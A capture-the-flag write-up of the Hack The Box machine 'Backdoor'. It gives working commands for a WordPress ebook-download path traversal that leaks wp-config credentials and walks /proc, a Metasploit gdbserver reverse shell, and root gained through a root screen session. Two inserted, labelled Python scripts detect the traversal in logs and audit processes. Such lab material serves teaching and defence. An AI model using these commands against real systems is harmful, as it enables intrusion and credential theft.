Backdoor - [HTB]

Marmeus

Introduction

Backdoor is a Linux machine where the attacker has to discover the commands being executed on the host through an LFI in a WordPress plugin. Finally, to become root, the attacker has to attach to a screen session that is running as root.

Enumeration

As always, let's start by finding all open ports on the machine with Nmap.

kali@kali:~/Documents/HTB/backdoor$ sudo nmap -v -sS -p- -n -T5 -oN AllPorts.txt 10.10.11.125
Warning: 10.10.11.125 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.125
Host is up (0.18s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste

Read data files from: /usr/bin/../share/nmap
# Nmap done at Mon Nov 22 12:27:33 2021 -- 1 IP address (1 host up) scanned in 371.30 seconds

Then, we continue with a deeper scan of every open port, getting more information about each service.

kali@kali:~/Documents/HTB/backdoor$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,1337 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.18s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking for domains on the web page, we can find backdoor.htb.

kali@kali:~/Documents/HTB/backdoor$ curl http://10.10.11.125/ | grep --color .htb
[...]
u-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="http://backdoor.htb/">Home</a></li> 
backdoor.htb

Enumerating WordPress with WPScan, we can find an installed plugin.

kali@kali:~/Documents/HTB/backdoor$ wpscan --url http://backdoor.htb/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
[...]
[+] ebook-download
 | Location: http://www.backdoor.htb/wp-content/plugins/ebook-download/
 | Last Updated: 2020-03-12T12:52:00.000Z
 | Readme: http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/, status: 200
 |
 | Version: 1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.backdoor.htb/wp-content/plugins/ebook-download/readme.txt
[...]

Exploitation

The Ebook Download plugin has an associated vulnerability (a path traversal in filedownload.php) on Exploit-DB, which can be exploited with the following command:

kali@kali:~/Documents/HTB/backdoor$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
[...]
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
[...]

Exploitation 2

Because port 1337 is very common in CTFs, there may be a custom binary listening on it.

In order to find the executed commands, we can take advantage of the path traversal vulnerability by iterating over the /proc/ folder and reading each process's cmdline file.

After waiting for some time, we can see that gdbserver is listening on port 1337.

kali@kali:~/Documents/HTB/backdoor$ for i in {1..10000}; do echo $i; curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline 2>/dev/null | grep -v window.close ; done

[...]
/proc/957/cmdline/proc/957/cmdline/proc/957/cmdline/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done<script>window.close()</script>958
/proc/958/cmdline/proc/958/cmdline/proc/958/cmdline<script>window.close()</script>959
/proc/959/cmdline/proc/959/cmdline/proc/959/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script>960
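From the defender's side, both requests shown above (the wp-config.php read and the /proc/<pid>/cmdline walk) leave a distinctive trail in the Apache access log. The following Python script is an added example, not part of the original write-up nor of the plugin: it parses combined-format log lines, decodes the ebookdownloadurl parameter, flags traversal (".." components) and absolute reads of system paths, and counts hits per client so that a loop firing thousands of /proc requests stands out. The log lines are constructed for the example; the client address, timestamps and sizes are placeholders.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not from the original post).
# They model the two request patterns in the write-up: reading wp-config.php through
# "../" and walking /proc/<pid>/cmdline via the same plugin parameter.
SAMPLE_LOG = """\
10.10.15.118 - - [22/Nov/2021:12:40:01 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3214 "-" "curl/7.74.0"
10.10.15.118 - - [22/Nov/2021:12:41:10 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/957/cmdline HTTP/1.1" 200 180 "-" "curl/7.74.0"
10.10.15.118 - - [22/Nov/2021:12:41:10 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%2Fproc%2F959%2Fcmdline HTTP/1.1" 200 190 "-" "curl/7.74.0"
10.10.15.118 - - [22/Nov/2021:12:41:11 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2000 "-" "curl/7.74.0"
192.168.1.20 - - [22/Nov/2021:12:42:00 -0500] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=books/sample.pdf HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
192.168.1.21 - - [22/Nov/2021:12:42:05 -0500] "GET /index.php HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories a legitimate ebook download should never point at.
SENSITIVE_PREFIXES = ("/proc/", "/etc/", "/root/", "/home/", "/var/")


def classify_target(target):
    """Return a reason string if the request reads outside the plugin's directory, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/ebook-download/filedownload.php"):
        return None
    raw = parse_qs(parts.query).get("ebookdownloadurl", [""])[0]
    # parse_qs already percent-decoded once; decode again so double-encoded
    # payloads (%252e%252e) are normalised before the checks below.
    decoded = unquote(raw).replace("\\", "/")
    if ".." in decoded.split("/"):
        return f"path traversal: {decoded}"
    if decoded.startswith(SENSITIVE_PREFIXES):
        return f"absolute path read: {decoded}"
    return None


def scan_log(text):
    """Return a list of (client_ip, timestamp, reason) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_target(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("ts"), reason))
    return hits


def burst_sources(hits, threshold=3):
    """Clients with at least `threshold` hits; a /proc walk produces thousands from one address."""
    counts = Counter(ip for ip, _, _ in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, ts, reason in found:
        print(f"{ts} {ip} {reason}")
    print("burst sources:", burst_sources(found))
```

Running the script against a real access log only needs `scan_log(open(path).read())`; the prefix list and the burst threshold are the two knobs worth tuning per site.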

In Metasploit, there is a module for gdbserver which allows us to obtain a reverse shell as "user".

msf6 > use multi/gdb/gdb_server_exec
msf6 exploit(multi/gdb/gdb_server_exec) > options

Module options (exploit/multi/gdb/gdb_server_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
   RHOSTS    backdoor.htb     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     1337             yes       The target port (TCP)


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.15.118     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   x86_64 (64-bit)
msf6 exploit(multi/gdb/gdb_server_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.118:4444 
[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
[*] 10.10.11.125:1337 - Stepping program to find PC...
[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.10.11.125:1337 - Executing the payload...
[*] Command shell session 6 opened (10.10.15.118:4444 -> 10.10.11.125:35586 ) at 2021-11-22 14:22:35 -0500

id 
uid=1000(user) gid=1000(user) groups=1000(user)

Privilege Escalation

Enumerating with linpeas, we can see that the root user is executing an infinite loop that keeps a detached screen session alive.

[...]
root         957  0.0  0.0   2608  1756 ?        Ss   11:19   0:14      _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -d mS root ;; done
[...]
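The two findings from this box (a root loop that keeps a detached screen session alive, and a gdbserver bound to every interface) can be pulled out of a process listing automatically. The following Python script is an added example, not part of the write-up, of linpeas or of any tool it mentions: it parses `ps aux` output and reports both patterns. The sample listing is constructed to mirror the two command lines recovered from /proc earlier; the other rows are filler.

```python
import re

# Constructed `ps aux` sample (not from the original post). Rows 957 and 959 repeat
# the command lines the write-up recovered from /proc/<pid>/cmdline; the rest is filler.
SAMPLE_PS = """\
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.2 167756 11344 ?        Ss   11:19   0:02 /sbin/init
root         957  0.0  0.0   2608  1756 ?        Ss   11:19   0:14 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \\;; done
root         959  0.0  0.0   2608  1704 ?        Ss   11:19   0:13 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
user        2231  0.0  0.1   5420  3240 ?        S    14:20   0:00 gdbserver --once 0.0.0.0:1337 /bin/true
www-data    1012  0.0  0.4 210000 20000 ?        S    11:19   0:01 /usr/sbin/apache2 -k start
"""

# `screen -dmS name` (or -dS) starts a detached session; capture the session name.
SCREEN_RE = re.compile(r"\bscreen\s+-(?:dm|md|d)S\s+(\S+)")
# gdbserver takes HOST:PORT as its listen address.
GDBSERVER_RE = re.compile(r"\bgdbserver\b.*?\s(\S+):(\d+)\b")
WILDCARD_HOSTS = ("0.0.0.0", "*", "::")


def parse_ps(text):
    """Parse `ps aux` output into dicts with user, pid and the full command line."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 10)           # 11 columns; COMMAND keeps its spaces
        if len(fields) < 11:
            continue
        rows.append({"user": fields[0], "pid": int(fields[1]), "cmd": fields[10]})
    return rows


def audit_processes(rows):
    """Return (pid, finding) pairs for the two risky patterns seen on this box."""
    findings = []
    for r in rows:
        cmd = r["cmd"]
        # A root-owned loop that recreates a detached screen session leaves a root
        # shell permanently available to anyone screen allows to attach.
        m = SCREEN_RE.search(cmd)
        if m and r["user"] == "root":
            findings.append((r["pid"], f"root keeps a detached screen session '{m.group(1)}' alive"))
        # gdbserver has no authentication and executes what the remote debugger
        # asks; bound to a wildcard address it is reachable from the network.
        g = GDBSERVER_RE.search(cmd)
        if g and g.group(1) in WILDCARD_HOSTS:
            findings.append((r["pid"], f"{r['user']}-owned process runs gdbserver on all interfaces, port {g.group(2)}"))
    return findings


if __name__ == "__main__":
    for pid, finding in audit_processes(parse_ps(SAMPLE_PS)):
        print(f"pid {pid}: {finding}")
```

On a live host, feed it `subprocess.run(["ps", "aux"], capture_output=True, text=True).stdout` instead of the constructed sample.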

In order to access the active root screen session, we need to execute the following command, which attaches to root's session named "root".

screen -x root/root 
Must be connected to a terminal.

However, screen refuses to run without a proper terminal, so we first spawn a pty, set TERM and then attach, becoming root.

$ python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:/home/user$ screen -x root
screen -x root
Please set a terminal type.
user@Backdoor:/home/user$ export TERM=xterm
export TERM=xterm
user@Backdoor:/home/user$ screen -x root
screen -x root
There is no screen to be attached matching root.
user@Backdoor:/home/user$ screen -x root/root

root@Backdoor:~# cat /root/root.txt
[CENSORED]